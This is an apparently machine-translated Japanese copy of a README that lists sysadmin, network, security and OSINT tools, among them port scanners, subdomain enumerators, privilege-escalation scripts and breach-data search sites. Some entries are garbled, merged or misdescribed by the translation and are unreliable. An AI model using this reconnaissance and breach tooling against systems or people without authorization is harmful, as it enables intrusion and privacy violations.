the-book-of-secret-knowledge - 刺激的なリスト、マニュアル、チートシート、ブログ、ハック、ワンライナー、CLI / Webツールなどのコレクション。

(A collection of inspiring lists, manuals, cheatsheets, blogs, hacks, one-liners, cli/web tools and more.)

Created at: 2018-06-23 18:43:14
Language:
License: MIT

主人

"知識は強力です、あなたがそれをどのように使うかに注意してください!"

刺激的なリスト、マニュアル、チートシート、ブログ、ハック、ワンライナー、CLI / Webツールなどのコレクション。


プル要求 MITライセンス

トリムストレイ寄稿者によって作成されました


📔それはなんですか。

このリポジトリは、私が仕事で毎日使用しているさまざまな資料とツールのコレクションです。それは一枚に集められた多くの有用な情報を含んでいます。それは私がしばしば振り返る貴重な知識の源です。

🚻誰のため?

みんなのために、本当に。ここでは誰もが自分の好きな味を見つけることができます。しかし、完全に正直に言うと、それはシステムおよびネットワーク管理者、DevOps、ペンテスター、およびセキュリティ研究者を対象としています。

ℹ️貢献

意味をなさないものや正しくないと思われるものを見つけた場合は、プルリクエストを行い、変更やコメントについて有効で合理的な説明を追加してください。

このプロジェクトのいくつかの簡単なルール:

  • 魅力的で明確
  • 疲れない
  • 便利

以下のルールの方が優れている場合があります。

  • 貢献するのは簡単 (マークダウン + HTML ...)
  • 見つけやすい(単純な目次、多分それはそれらを拡張する価値がありますか?

マークされたURL一時的に利用できません。完全に有効期限が切れていることを確認せずに削除しないでください。

プルリクエストを追加する前に、投稿ガイドラインを参照してください。これについても覚えておく必要があります。

+ This repository is not meant to contain everything but only good quality stuff.

すべての提案/ PRは大歓迎です!

コードコントリビューター

このプロジェクトは、貢献するすべての人々のおかげで存在します。

財政的貢献者

📰RSS フィードと更新

GitHubはコミットのRSS/Atomフィードを公開しており、すべての変更について常に情報を入手したい場合にも役立ちます。

☑️やること

  • []新しいものを追加します...
  • []便利なシェル関数を追加する
  • []収集ツール用のワンライナーを追加します(例:.CLI ツール)
  • []リスト内のソート順

新しいアイテムも定期的に追加されます。

💢目次

主な章のみ:

🔱秘密の知識の書(章)

CLI ツール[目次]

▪️シェル

  🔸GNU Bash- は sh 互換シェルで、Korn シェルと C シェルの便利な機能を組み込んでいます。
🔸Zsh-はインタラクティブな使用のために設計されたシェルですが、強力なスクリプト言語でもあります。
🔸tclsh-は非常に強力なクロスプラットフォームシェルであり、幅広い用途に適しています。
🔸bash-it- は、シェルスクリプトとカスタムコマンドを使用、開発、および保守するためのフレームワークです。
🔸ああ、私のZSH!- は、Zsh 設定を管理するための最適なフレームワークです。
🔸オーマイフィッシュ-フィッシュシェルフレームワーク。
🔸スターシップ-Rustで書かれたクロスシェルプロンプト。
🔸powerlevel10k- は Powerlevel9k ZSH テーマの高速再実装です。

▪️シェルプラグイン

  🔸z-は、最もよく使用するフォルダーを追跡し、パス全体を入力せずにジャンプできるようにします。
🔸fzf- は汎用のコマンドラインファジーファインダーです。
🔸zsh-autosuggestions- Zsh.zshのための魚のような自動提案-構文の強調表示- Zsh.Awesome
🔸
🔸ZSH プラグインのための構文の強調表示のような魚殻 - ZSH のためのフレームワーク、プラグイン、テーマとチュートリアルのリスト。

▪️マネージャー

  🔸Midnight Commander - はビジュアルファイルマネージャで、GNU一般公衆利用許諾契約書の下でライセンスされています。
🔸ranger- は VIM にインスパイアされたコンソールのファイルマネージャです。
🔸nnn-は、小さくて超高速で、機能満載のファイルマネージャーです。
🔸screen-は、物理端末を多重化するフルスクリーンウィンドウマネージャーです。
🔸tmux-は端末マルチプレクサであり、1つの端末で複数のプログラムを簡単に切り替えることができます。
🔸tmux-cssh- は、快適で使いやすい機能を設定し、TMUX セッションをクラスタリングおよび同期するためのツールです。

▪️テキストエディタ

  🔸vi- は Unix で最も一般的なテキストエディタの 1 つです。
🔸vim-は高度に構成可能なテキストエディタです。
🔸emacs- は、拡張可能でカスタマイズ可能なフリー/リブレテキストエディタなどです。
🔸micro-は、モダンで直感的な端末ベースのテキストエディタです。
🔸neovim-は、無料のオープンソースで、強力で、拡張可能で、使いやすいコードエディタです。
🔸spacemacs-コミュニティ主導のEmacsディストリビューション。
🔸スペースヴィム - コミュニティ主導の Vim ディストリビューション。

▪️ファイルとディレクトリ

  🔸FD-は、見つけるためのシンプルで高速でユーザーフレンドリーな代替手段です。
🔸ncdu-は、使いやすく、高速なディスク使用量アナライザーです。

▪️ネットワーク

  🔸PuTTY- は SSH および telnet クライアントで、元々は Simon Tatham によって開発されました。
🔸Mosh- は、揮発性接続上で SSH セッションを維持するように設計された SSH ラッパーです。
🔸エターナルターミナル:SSHセッション内でマウススクロールとtmuxコマンドを有効にします。
🔸nmap-は、ネットワーク検出とセキュリティ監査のための無料のオープンソース(ライセンス)ユーティリティです。
🔸zmap-は、インターネット全体のネットワーク調査用に設計された高速シングルパケットネットワークスキャナーです。
🔸ラストスキャン-Nmapよりも速く開いているすべてのポートを見つけます。
🔸masscan-は最速のインターネットポートスキャナーであり、SYNパケットを非同期に吐き出します。
🔸pbscan-は、より高速で効率的なステートレスSYNスキャナーおよびバナーグラバーです。
🔸hping- は、コマンドライン指向の TCP/IP パケットアセンブラ/アナライザです。
🔸mtr- は 'traceroute' プログラムと 'ping' プログラムの機能を 1 つのツールにまとめたツールです。
🔸mylg-異なるネットワークプローブの機能を1つの診断ツールに組み合わせたユーティリティ。
🔸netcat- TCP/IP プロトコルを使用して、ネットワーク接続を介してデータを読み書きするユーティリティ。
🔸socat- 2つのオブジェクト間でデータを転送するユーティリティ。
🔸tcpdump- は、強力なコマンドラインパケットアナライザです。
🔸tshark- は、ネットワークトラフィックをダンプして分析できるツールです(Wireshark CLI)。
🔸Termshark- は tshark のためのシンプルな端末ユーザインタフェースです。
🔸ngrep- はネットワーク層に適用される GNU grep のようなものです。
🔸netsniff-ng-は、毎日のLinuxネットワーク配管用のスイスアーミーナイフです。
🔸ソックダンプ - UNIX ドメインソケットトラフィックをダンプします。
🔸速記者-は、すべてのパケットをディスクにすばやくスプールすることを目的としたパケットキャプチャソリューションです。
🔸tcpterm:TUIでパケットを視覚化します。
🔸bmon- は、ネットワーク関連の統計情報をキャプチャし、視覚的に準備するための監視およびデバッグツールです。
🔸iptraf-ng- は、IP トラフィックに関する情報を表示する Linux 用のコンソールベースのネットワーク監視プログラムです。
🔸vnstat- は Linux および BSD 用のネットワークトラフィックモニタです。
🔸iPerf3-は、IPネットワーク上で達成可能な最大帯域幅をアクティブに測定するためのツールです。
🔸ethr- は TCP, UDP& HTTP 用のネットワークパフォーマンス測定ツールです。
🔸Etherate- は、Linux CLI ベースのイーサネットおよび MPLS トラフィック テスト ツールです。
🔸エコーイップ- Is IP アドレス検索サービス。
🔸ネメシス-パケット操作CLIツール。複数のプロトコルのパケットを作成して挿入します。
🔸packetfu- Ruby 用の中間レベルのパケット操作ライブラリです。
🔸Scapy-パケット操作ライブラリ;多数のプロトコルのパケットを偽造、送信、デコード、キャプチャします。
🔸impacket- は、ネットワークプロトコルを操作するための Python クラスのコレクションです。
🔸ssh-audit- は SSH サーバ監査のためのツールです。
🔸aria2- は軽量のマルチプロトコル&マルチソースコマンドラインダウンロードユーティリティです。
🔸iptables-トレーサー-iptablesチェーンを通るパケットのパスを観察します。
🔸Inception-任意の数のホストに対して好きなものをチェックするための高度に構成可能なツール。
🔸mRemoteNG - ステロイドのmRemote、マルチタブPuTTyのフォーク!

▪️ネットワーク (DNS)

  🔸dnsdiag- は、DNS 診断およびパフォーマンス測定ツールです。
🔸fierce- は、連続していないIP空間を特定するためのDNS偵察ツールです。
🔸subfinder-は、Webサイトの有効なサブドメインを検出するサブドメイン検出ツールです。
🔸Sublist3R- は、侵入テスター向けの高速サブドメイン列挙ツールです。
🔸amass-は、データソースのスクレイピング、Webアーカイブのクロールなどによってサブドメイン名を取得するツールです。
🔸namebench-閲覧履歴に基づいてパーソナライズされたDNSサーバーの推奨事項を提供します。
🔸massdns- は、一括検索と偵察のための高性能DNSスタブリゾルバです。
🔸knock- は、ワードリストを介してターゲットドメインのサブドメインを列挙するツールです。
🔸dnsperf- DNS パフォーマンス テスト ツール。
🔸dnscrypt-proxy 2-暗号化されたDNSプロトコルをサポートする柔軟なDNSプロキシ。
🔸dnsdbq - パッシブ DNS データベースシステムへのアクセスを提供する API クライアント。
🔸Grimd-ブラックホールインターネット広告とマルウェアサーバーに構築された高速DNSプロキシ。
🔸DNSTWIST-タイプミス、フィッシング攻撃、詐欺、ブランドのなりすましを検出します。

▪️ネットワーク (HTTP)

  🔸curl- は、URL を使用してデータを転送するためのコマンドラインツールおよびライブラリです。
🔸kurly-は、Golangで書かれた広く人気のあるcurlプログラムの代替です。
🔸HTTPie- はユーザーフレンドリーな HTTP クライアントです。
🔸wuzz- は HTTP インスペクションのためのインタラクティブな CLI ツールです。
🔸h2spec- は HTTP/2 実装のためのコンフォーマンステストツールです。
🔸H2T-は、システム管理者がWebサイトを強化するのに役立つシンプルなツールです。
🔸htrace.sh-は、http / httpsのトラブルシューティングとプロファイリングのためのシンプルなスイスアーミーナイフです。
🔸httpstat-は、カール統計を美しさと明快さの方法で視覚化するツールです。
🔸httplab- はインタラクティブなウェブサーバです。
🔸Lynx- は、ワールドワイドウェブ用のテキストブラウザです。
🔸Browsh-は、完全にインタラクティブでリアルタイムの最新のテキストベースのブラウザです。
🔸ヘッドレスブラウザ - 存在する(ほぼ)すべてのヘッドレスWebブラウザのリスト。
🔸ab- は、HTTP Web サーバーのパフォーマンスを測定するためのシングルスレッドコマンドラインツールです。
🔸Siege- は、HTTP ロード テストおよびベンチマーク ユーティリティです。
🔸wrk- は、かなりの負荷を生成できる最新の HTTP ベンチマークツールです。
🔸wrk2- は、wrk の一定のスループット、正しいレイテンシー記録バリアントです。
🔸Vegeta-は、WRKの一定のスループット、正しいレイテンシー記録バリアントです。
🔸ボンバルディア-Goで書かれた高速クロスプラットフォームのHTTPベンチマークツールです。
🔸ゴーベンチ - HTTP / HTTPSロードテストおよびベンチマークツール。
🔸ねえ- HTTPロードジェネレータ、ApacheBench(ab)の代替品、以前はrakyll / boomとして知られていました。
🔸boom- は、Web アプリのデプロイをすばやくスモーク テストするために使用できるスクリプトです。
🔸SlowHTTPTest- は、HTTP を延長することで、一部のアプリケーション層のサービス拒否攻撃をシミュレートするツールです。
🔸gobuster- は、Go で書かれたフリーでオープンソースのディレクトリ/ファイル& DNS 無効化ツールです。
🔸ssllabs-scan- SSL Labs API 用のコマンドライン参照実装クライアント。
🔸http-observatory- Mozilla HTTP Observatory cli version.
🔸Hurl- は、プレーンテキストでHTTPリクエストを実行およびテストするためのコマンドラインツールです。

▪️ティッカー

  🔸openssl- は、TLS および SSL プロトコル用の堅牢で商用グレードのフル機能のツールキットです。
🔸gnutls-cli- 他のコンピュータへの TLS 接続を設定するためのクライアントプログラム。
🔸sslyze-高速で強力なSSL / TLSサーバースキャンライブラリ。
🔸sslscan- SSL/TLS 対応サービスをテストして、サポートされている暗号スイートを検出します。
🔸testssl.sh - 任意のポートでどこでも TLS/SSL 暗号化をテストします。
🔸cipherscan-ターゲットでサポートされているSSL暗号スイートを見つける非常に簡単な方法。
🔸spiped- は、ソケットアドレス間に対称的に暗号化および認証されたパイプを作成するためのユーティリティです。
🔸Certbot- は、Let's Encryptから証明書を取得し、(オプションで)サーバー上でHTTPSを自動的に有効にするEFFのツールです。
🔸mkcert-ローカルで信頼できる開発証明書を任意の名前で作成するためのシンプルなゼロ構成ツール。
🔸certstrap - CA、証明書要求、および署名付き証明書をブートストラップするためのツール。
🔸Sublert-は、新しいサブドメインを自動的に監視するためのセキュリティおよび偵察ツールです。
🔸mkchain-有効なSSL証明書チェーンの構築に役立つオープンソースツール。
🔸ssl-cert-check- SSL 証明書有効期限チェッカー。

▪️安全

  🔸SELinux- は、Linux カーネルに組み込まれた柔軟な強制アクセス制御 (MAC) システムを提供します。
🔸AppArmor-オペレーティングシステムとアプリケーションを外部または内部の脅威からプロアクティブに保護します。
🔸grapheneX-自動システム強化フレームワーク。
🔸DevSec 強化フレームワーク - セキュリティ + DevOps: 自動サーバー強化。

▪️監査ツール

  🔸ossec-ファイル整合性監視を使用して、システムアクティビティのすべての側面をアクティブに監視します。
🔸auditd-システム上のセキュリティ関連情報を追跡する方法を提供します。
🔸Tiger-は、セキュリティ監査と侵入検知システムの両方として使用できるセキュリティツールです。
🔸Lynis-Linux、macOS、またはUnixベースのオペレーティングシステムを実行しているシステム用のバトルテスト済みのセキュリティツール。
🔸LinEnum- scripted Local Linux Enumeration & Privilege Escalation Checks.
🔸Rkhunter -システム上のバックドア、ルートキット、およびローカルエクスプロイトをスキャンするLinuxシステム用のスキャナーツール。
🔸PE-sieve-は、システムで実行されているマルウェアを検出するのに役立つ軽量ツールです。
🔸PEASS - Windows および Linux/Unix および macOS 用の特権エスカレーションツール。

▪️システム診断/デバッガ

  🔸strace-Linux用の診断、デバッグ、および教育用ユーザースペースユーティリティ。
🔸DTrace- は、パフォーマンス分析およびトラブルシューティングツールです。
🔸ltrace- はライブラリ呼び出しトレーサであり、プログラムによってライブラリ関数に対して行われた呼び出しをトレースするために使用されます。
🔸ptrace-burrito-は、ptraceのフレンドリーなラッパーです。
🔸perf-tools-Linux perf_events (別名 perf) と ftrace をベースにしたパフォーマンス解析ツール。
🔸bpftrace- Linux eBPF 用の高レベルトレース言語。
🔸sysdig-コンテナのファーストクラスサポートを備えたシステム探索およびトラブルシューティングツール。
🔸Valgrind- は、動的解析ツールを構築するためのインストルメンテーションフレームワークです。
🔸gperftools-高性能マルチスレッドmalloc()実装、およびいくつかのパフォーマンス分析ツール。
🔸glances - Pythonで書かれたクロスプラットフォームのシステム監視ツール。
🔸htop- Unix システム用のインタラクティブなテキストモードプロセスビューア。それはより良い「トップ」になることを目指しています。
🔸バシュトップ - 純粋なバッシュで書かれたLinuxリソースモニター。
🔸nmon-パフォーマンスの監視とデータ分析のための単一の実行可能ファイル。
🔸トップ - ASCIIパフォーマンスモニタ。CPU、メモリ、ディスク、スワップ、ネットワーク、およびプロセスの統計情報が含まれます。
🔸lsof- プロセスによって開かれたファイルに関する情報を出力に表示します。
🔸フレームグラフ - スタックトレースビジュアライザー。
🔸lsofgraph- Unix の lsof 出力を FIFO および UNIX のプロセス間通信を示すグラフに変換します。
🔸RR-は、アプリケーションの実行を記録、再生、およびデバッグするための軽量ツールです。
🔸パフォーマンスコパイロット-システムパフォーマンス分析ツールキット。
🔸ヘキシル - コマンドラインの hex ビューア。
🔸Austin-CPython用のPythonフレームスタックサンプラー。

▪️ログ アナライザー

  🔸アングルグラインダー-コマンドラインのスライスとダイスのログファイル。
🔸lnav-検索と自動更新を備えたログファイルナビゲーター。
🔸GoAccess - ターミナルで実行されるリアルタイムのウェブログアナライザーとインタラクティブビューア。
🔸NGXTOP - nginxサーバーのリアルタイムメトリクス。

▪️データベース

  🔸usql- SQL データベース用の汎用コマンドラインインターフェイス。
🔸pgcli- オートコンプリートと構文の強調表示を備えた CLI を投稿します。
🔸mycli - オートコンプリートと構文の強調表示を備えた MySQL のターミナルクライアント。
🔸litecli - オートコンプリートと構文の強調表示を備えたSQLite CLI。
🔸mssql-cli- オートコンプリートと構文の強調表示を備えた SQL Server CLI。
🔸OSQuery- は、SQL を利用したオペレーティング システムのインストルメンテーション、監視、および分析フレームワークです。
🔸pgsync-あるPostgresデータベースから別のデータベースにデータを同期します。
🔸iredis-オートコンプリートと構文の強調表示を備えたRedis用のターミナルクライアント。
🔸スキーマクローラー - データベースの E-R ダイアグラムを生成します。

▪️トア

  🔸Nipe-Torネットワークをデフォルトゲートウェイにするためのスクリプト。
🔸multitor - 負荷分散を使用して複数のTORインスタンスを作成できるツール。

▪️メッセンジャー/IRCクライアント

  🔸Irssi- は、フリーのオープンソース端末ベースの IRC クライアントです。
🔸WeeChat- は非常に拡張性があり軽量な IRC クライアントです。

▪️生産性

  🔸タスクウォリアー-タスク管理システム、やることリスト

▪️その他 __________

  🔸sysadmin-util- tools. for Linux/Unix sysadmins.
🔸Incron- は、iノードベースのファイルシステム通知技術です。
🔸lsyncd- ローカルディレクトリをリモートターゲット (ライブ同期デーモン) と同期します。
🔸GRV- は、Git リポジトリを表示するためのターミナルベースのインターフェイスです。
🔸Git 用の Tig - テキストモードインターフェイス。
🔸TLDR - 簡略化されたコミュニティ主導のマニュアルページ。
🔸アーカイバ-.zip、.tar、.tar.gz、.tar.bz2、.tar.xz、.tar.lz4、.tar.sz、および.rarを簡単に作成および抽出します。
🔸コマンダー.js- JavaScript の最小限の CLI クリエーター。
🔸グロン-JSONをグルッパブルにします!
🔸ベッド-Goで書かれたバイナリエディタ。

GUI ツール[目次]

▪️端末エミュレータ

  🔸Guake- は、GNOMEデスクトップ環境用に作成されたドロップダウン端末です。
🔸ターミネーター-GNOMEターミナルに基づいており、システム管理者や他のユーザーにとって便利な機能です。
🔸Kitty-は、スムーズなスクロールと画像をサポートするGPUベースのターミナルエミュレータです。
🔸Alacritty- は、高速でクロスプラットフォームの OpenGL ターミナルエミュレータです。

▪️ネットワーク

  🔸Wireshark-は、世界有数で広く使用されているネットワークプロトコルアナライザです。
🔸Ettercap-は包括的なネットワークモニターツールです。
🔸EtherApe-は、グラフィカルなネットワーク監視ソリューションです。
🔸パケット送信者-は、パケット生成と組み込みのUDP / TCP / SSLクライアントおよびサーバー用のネットワークユーティリティです。
🔸オスティナート-はパケットクラフターおよびトラフィックジェネレーターです。
🔸JMeter™-機能動作をロードテストし、パフォーマンスを測定するためのオープンソースソフトウェア。
🔸イナゴ - Python で記述されたスケーラブルなユーザー負荷テストツール。

▪️ブラウザー

  🔸TORブラウザ-プライバシーを保護し、ネットワーク監視とトラフィック分析から身を守ります。

▪️パスワードマネージャー

  🔸KeePassXC-パスワードを安全に保存し、日常のWebサイトやアプリに自動入力します.
🔸Bitwarden-同期が組み込まれたオープンソースのパスワードマネージャー。
🔸Vaultwarden-Rustで書かれた非公式のビットワーデン互換サーバー。

▪️メッセンジャー/IRCクライアント

  🔸HexChat- は XChat をベースにした IRC クライアントです。
🔸Pidgin-は、何百万人もの人々が使用する使いやすく無料のチャットクライアントです。

▪️メッセンジャー(エンドツーエンド暗号化)

  🔸Signal-暗号化された通信アプリです。
🔸すべてがエンドツーエンドの暗号化で保護されています。
🔸TorChat-Tor隠しサービスの上に分散型匿名インスタントメッセンジャー。
🔸マトリックス-安全で分散型のリアルタイム通信のためのオープンネットワーク。

▪️テキストエディタ

  🔸Sublime Text-は、その速度と使いやすさで知られる軽量のクロスプラットフォームのコードエディタです。
🔸Visual Studio Code - マイクロソフトが開発したオープンソースで無料のソースコードエディタです。
🔸Atom-21世紀のハッキング可能なテキストエディタ。

ウェブツール[目次]

▪️ブラウザー

  🔸ブラウザのSSL / TLS機能-ブラウザのSSL実装をテストします。
🔸使用できますか-フロントエンドWebテクノロジーをサポートするための最新のブラウザサポートテーブルを提供します。
🔸パノプティクリック3.0-お使いのブラウザは追跡に対して安全ですか?
🔸プライバシーアナライザー-ブラウザから公開されているデータを確認します。
🔸Webブラウザのセキュリティ-それはすべてWebブラウザのフィンガープリントに関するものです。
🔸私のSSLはどうですか?- Webサーバー開発者が実際のTLSクライアントが何ができるかを学ぶのを助けます。
🔸sslClientInfo- client test (TLSv1.3 情報を含む)。

▪️SSL/セキュリティ

  🔸SSLLabsサーバーテスト-SSL Webサーバーの構成の詳細な分析を実行します。
🔸SSLLabs サーバ テスト (DEV) - 任意の SSL Web サーバの設定の詳細な分析を実行します。
🔸ImmuniWeb® SSLScan- test SSL/TLS (PCI DSS, HIPAA および NIST)。
🔸SSLチェック-Webサイトをスキャンして、安全でないコンテンツを探します。
🔸SSLスキャナー-Webサイトのセキュリティを分析します。
🔸クリプトチェック-TLSサーバー構成(暗号など)をテストします。
🔸urlscan.io-ウェブサイトをスキャンして分析するサービス。
🔸レポート URI - CSP や HPKP などのセキュリティ ポリシーを監視します。
🔸CSPエバリュエーター-開発者とセキュリティ専門家がコンテンツセキュリティポリシーかどうかを確認できるようにします。
🔸役に立たないCSP-一部の大手プレーヤーのCSPに関する公開リスト(もう少し気にさせるかもしれません)。
🔸なぜHTTPSがないのですか?-Alexaランクのトップ100Webサイトは、安全でないリクエストを自動的にリダイレクトしません。
🔸TLS暗号スイート検索-暗号スイート検索エンジン。
🔸cipherli.st-Apache、Nginx、Lighttpdなどの強力な暗号。*
🔸dhtool-パブリックディフィーヘルマンパラメータサービス/ツール。
🔸badssl.com-不正なSSL構成に対してクライアントをテストするための思い出に残るサイト。
🔸tlsfun.de - TLS/SSL プロトコルに関するさまざまなテストに登録されています。
🔸CAA レコード ヘルパー - CAA ポリシーを生成します。
🔸共通 CA データベース - CA に関する情報、およびそのルート証明書と中間証明書のリポジトリ。
🔸CERTSTREAM-リアルタイムの証明書透過性ログ更新ストリーム。
🔸crt.sh - 一般に知られているすべての CT を継続的に監視して証明書を検出します
🔸セキュリティ標準を強化 - 展開します。
🔸暗号スイートの互換性 - TLS 暗号スイートの互換性をテストします。
🔸URLVOID-このサービスは、潜在的に悪意のあるWebサイトを検出するのに役立ちます。
🔸セキュリティ.txt - ウェブサイトがセキュリティポリシーを定義できるようにする提案された標準(ジェネレータ)。
🔸ssl-config-generator- は、Mozilla サーバーサイドの TLS 設定ガイドラインに従うのに役立ちます。
🔸TLScan - 純粋なpython、SSL / TLSプロトコル、および暗号スキャナー/列挙子。

▪️ HTTP Headers & Web Linters

  🔸セキュリティヘッダー-HTTP応答ヘッダーを分析します(結果に評価システムを使用します)。
🔸Mozillaによる天文台 - あなたのウェブサイトを分析するためのツールのセット。
🔸Webhint-は、サイトのアクセシビリティ、速度、セキュリティなどに役立つリンティングツールです。

▪️ティッカー

  🔸ViewDNS - 無料のDNS関連ツールと情報の1つのソース。
🔸DNSLookup- は高度な DNS ルックアップツールです。
🔸DNSlytics-オンラインDNS調査ツール。
🔸DNSスパイ-DNS構成を監視、検証、検証します。
🔸ゾーンマスター-DNSの動作を制御するのに役立ちます。
🔸リーフDNS - 包括的なDNSテスター。
🔸オンラインでサブドメインを検索する-セキュリティ評価侵入テスト用のサブドメインを見つけます。
🔸DNSdumpster- dns recon & research, find & lookup dns records.
🔸DNS テーブル オンライン - ドメイン、IP、CIDR、ISP で DNS レコードを検索します。
🔸DNSに - DNSおよびメールサーバーのヘルスチェッカー。
🔸DNS バジャジ - ドメインの委任を確認します。
🔸BuddyDNS委任LAB - ドメインの委任を確認、追跡、視覚化します。
🔸dnssec-debugger - DS または DNSKEY レコードバリデーター。
🔸PTRarchive.com-このサイトは、過去の逆引きDNSレコードの保管を担当しています。
🔸xip.io - すべてのユーザーのためのワイルドカード DNS。
🔸nip.io-任意のIPアドレスのデッド単純なワイルドカードDNS。
🔸dnslookup(ceipam)-最高のDNS伝播チェッカーの1つ(そしてそれだけではありません)。
🔸私のDNSは何ですか-DNS伝播チェックツール。
🔸DNSGrep - 大規模な DNS データセットをすばやく検索します。

▪️郵便

  🔸smtp-tls-checker- SMTP TLS サポートについて電子メールドメインをチェックします。
🔸MXツールボックス-すべてのMXレコード、DNS、ブラックリスト、およびSMTP診断を1つの統合ツールに統合します。
🔸安全な電子メール-電子メール技術者向けの完全な電子メールテストツール。
🔸blacklistalert-ドメインがリアルタイムスパムブラックリストに登録されているかどうかを確認します。
🔸マルチRBL - メールサーバーを送信するための完全なIPチェック。
🔸DKIM SPF & Spam Assassin Validator - メール認証をチェックし、Spam Assassinでメッセージをスコアリングします。

▪️エンコーダー/デコーダーと正規表現のテスト

  🔸URLエンコード/デコード-テキストの文字列をエンコードまたはデコードするための上記のツール。
🔸アンコーダー - ログデータに対する検索クエリのオンライン翻訳者。
🔸Regex101 - オンライン正規表現テスターおよびデバッガ:PHP、PCRE、Python、Golang、JavaScript。
🔸RegExr-正規表現(RegEx / RegExp)を学習、構築、テストするためのオンラインツール。
🔸正規表現テスト - オンライン正規表現テストツール。
🔸正規表現パル - オンライン正規表現テストツール+その他のツール。
🔸サイバースイスアーミーナイフ-暗号化、エンコード、圧縮、データ分析のためのWebアプリ。

▪️ネットツール

  🔸Netcraft-サイトに関する詳細なレポートで、整合性について情報に基づいた選択を行うのに役立ちます。*
🔸RIPE NCC Atlas-グローバルでオープンな分散型インターネット測定プラットフォーム。
🔸Robtex-さまざまなソースを使用して、IP番号、ドメイン名、ホスト名などに関する公開情報を収集しますセキュリティ証跡-セキュリティ
🔸会社、研究者、チーム向けのAPI。
🔸オンラインカールカールテスト、HTTP応答ヘッダーの分析。
🔸開発者向けのオンラインツール-HTTP APIツール、テスター、エンコーダー、コンバーター、フォーマッター、およびその他のツール。
🔸Ping.eu-オンラインPing、トレースルート、DNSルックアップ、WHOISなど。
🔸ネットワークツール-ウェブマスター、IT技術者、オタクのためのネットワークツール。
🔸BGPビュー:ASN、IP、プレフィックス、またはリソース名を検索します。
🔸BGPはまだ安全ですか?- ISPやその他の主要なインターネットプレーヤーのBGP(RPKI)セキュリティを確認してください。
🔸Riseup-解放的な社会変化に取り組む人々やグループにオンラインコミュニケーションツールを提供します。
🔸VirusTotal-疑わしいファイルとURLを分析して、マルウェアの種類を検出します。

▪️プライバシー

  🔸privacyguides.org-グローバルな大量監視からプライバシーを保護するための知識とツールを提供します。
🔸DNSプライバシーテストサーバー-DNSプライバシー再帰サーバーリスト(「ロギングなし」ポリシー付き)。

▪️コードパーサー/プレイグラウンド

  🔸シェルチェック-シェルスクリプトのバグを見つけます。
🔸ExplainShell-シェルコマンドのインタラクティブなヘルプテキストを取得します。
🔸jsbin- HTML、CSS & JavaScript などのライブ ペーストビン。
🔸コードサンドボックス - ウェブアプリケーション開発のためのオンラインコードエディタ。
🔸PHPサンドボックス - このコードテスターでPHPコードをテストします。
🔸Repl.it-学習、構築、コラボレーション、およびホストをすべて1か所で実行できるインスタントIDE。
🔸vclFiddle- は、ワニスキャッシュVCLを試すためのオンラインツールです。
🔸Haskell Dockerfile Linter - ベストプラクティスのDockerイメージを構築するのに役立つ、よりスマートなDockerfileリンターです。

▪️パフォーマンス

  🔸GTmetrix-サイトの速度を分析し、高速化します。
🔸Sucuri loadtimetester-ここでテストしてください 世界中のサイトのパフォーマンス。
🔸Pingdomツール-世界中のサイトの速度を分析します。
🔸PingMe.io-複数の地理的地域でWebサイトの遅延テストを実行します。
🔸ページスピードインサイト-サイトの速度を分析し、高速化します。
🔸web.dev-あなたのような開発者がWebの最新機能を学び、自分のサイトやアプリに適用するのに役立ちます.
🔸Lighthouse-自動化された監査、パフォーマンスメトリック、およびWebのベストプラクティス。

▪️マススキャナー(検索エンジン)

  🔸Censys-情報セキュリティ担当者がデバイスを検出、監視、分析するのに役立つプラットフォーム。
🔸Shodan-インターネットに接続されたデバイス用の世界初の検索エンジン。
🔸Shodan 2000-このツールは、Shodanからランダムに生成されたデータを探します。
🔸グレイノイズ - ShodanやCensysなどのマススキャナ。
🔸ZoomEye-ユーザーが特定のネットワークコンポーネントを見つけることができるサイバースペースの検索エンジン。
🔸ネトグラフ - ウェブの深い構造を監視および理解するためのツール。
🔸FOFA-はサイバースペース検索エンジンです。
🔸Onyphe-は、収集されたオープンソースおよびサイバー脅威インテリジェンスデータの検索エンジンです。
🔸インテリジェンスX-は、検索エンジンとデータアーカイブです。
🔸BinaryEdge-インターネットスペース全体をスキャンし、リアルタイムの脅威インテリジェンスストリームとレポートを作成します。
🔸Spyse-インターネット資産レジストリ:ネットワーク、脅威、WebオブジェクトなどWigle
🔸-は、ワイヤレスネットワークの提出ベースのカタログです。すべてのネットワーク。みんなに見つかりました。
🔸パブリックWW-ウェブページのHTML、JS、およびCSSコードで英数字スニペット、署名、またはキーワードを検索します。
🔸インテルテクニック-このリポジトリには、何百ものオンライン検索ユーティリティが含まれています。
🔸ハンター-数秒でメールアドレスを見つけて、ビジネスにとって重要な人々とつながることができます。
🔸ゴーストプロジェクト?-完全なメールアドレスまたはユーザー名で検索します。
🔸データ侵害-私の電子メールはデータ侵害の影響を受けましたか?
🔸私たちは情報を漏らします-世界最速かつ最大のデータ侵害検索エンジン。
🔸パルス - 悪意のある URL、IP、およびドメインのスキャン(ポート スキャンや Web 要求を含む)。
🔸Buckets by Grayhatwarfar-Open Amazon S3バケットとその内容のパブリック検索を含むデータベース。
🔸Vigilante.pw - 侵害されたデータベースディレクトリ。
🔸構築-どのWebサイトが構築されているかを調べます。
🔸NerdyData-何百万ものサイトで、Webのソースコードでテクノロジーを検索します。
🔸Zorexeye-サイト、画像、アプリ、ソフトウェアなどを検索します。
🔸MamontのオープンFTPインデックス-ターゲットにアクセシブルなコンテンツを含むオープンFTPサイトがある場合、ここにリストされます。
🔸OSINTフレームワーク-無料のツールまたはリソースからの情報の収集に焦点を当てています。
🔸Maltiverse-は、侵害の兆候の高度な分析のためのサイバーセキュリティアナリスト向けのサービスです。
🔸リークされたソース-ルックアップの形でオンラインで見つかったデータのコラボレーションです。
🔸私たちは情報を漏らします-日常の個人がハッキングされるのを防ぎ、オンラインライフを保護するのに役立ちます。
🔸pipl-は、電子メールアドレス、ソーシャルユーザー名、または電話番号の背後にいる人を見つける場所です。
🔸abuse.ch-非営利団体のマルウェアと戦うランダムなスイス人によって運営されています。
🔸malc0de-マルウェア検索エンジン。
🔸サイバー犯罪トラッカー-サイバー犯罪の実行に使用されるさまざまなマルウェアファミリを監視および追跡します。
🔸shhgit-GitHubのシークレットをリアルタイムで見つけます。
🔸検索コード-関数、API、ライブラリの実際の例を見つけるのに役立ちます。
🔸Insecam-オンライン監視セキュリティカメラの世界最大のディレクトリ。
🔸インデックスオブ-には、セキュリティ、ハッキング、リバースエンジニアリング、暗号化、プログラミングなどの優れたものが含まれています.
🔸Rapid7 Labs Open Data-は、プロジェクトソナーのデータセットの優れたリソースです。
🔸共通応答ヘッダー - HTTP 応答ヘッダーの最大のデータベース。
